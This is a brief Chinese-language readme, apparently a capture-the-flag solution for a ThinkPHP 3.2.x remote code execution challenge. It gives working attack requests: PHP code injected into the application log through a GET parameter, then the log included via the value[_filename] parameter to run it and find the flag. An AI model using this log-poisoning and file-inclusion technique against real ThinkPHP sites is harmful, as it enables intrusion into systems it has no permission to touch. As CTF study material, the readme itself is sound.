readme
1、参考:【漏洞通报】ThinkPHP3.2.x RCE漏洞通报 (qq.com)
2、.log文件命名方式为 yy_mm_dd.log (yy为年,mm为月,dd为日)
3、重开了几次环境,所以截图混乱,但是步骤和方法可行
4、如果解题过程1不可行,可尝试解题过程2
解题过程1
1、访问网址,抓包,改数据包
2、访问\Application\Runtime\Logs\Common\yy_mm_dd.log(其中,yy为年,mm为月,dd为日)
3、构造请求攻击
http://xx.xx.xx.xx/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/yy_mm_dd.log(其中,yy为年,mm为月,dd为日)
ctrl+f 搜索 flag-
解题过程2
1、抓包,改数据包
GET /index.php?m=Home&c=Index&a=index&test=--><?=phpinfo();?> HTTP/1.12、剩余步骤同解题过程1
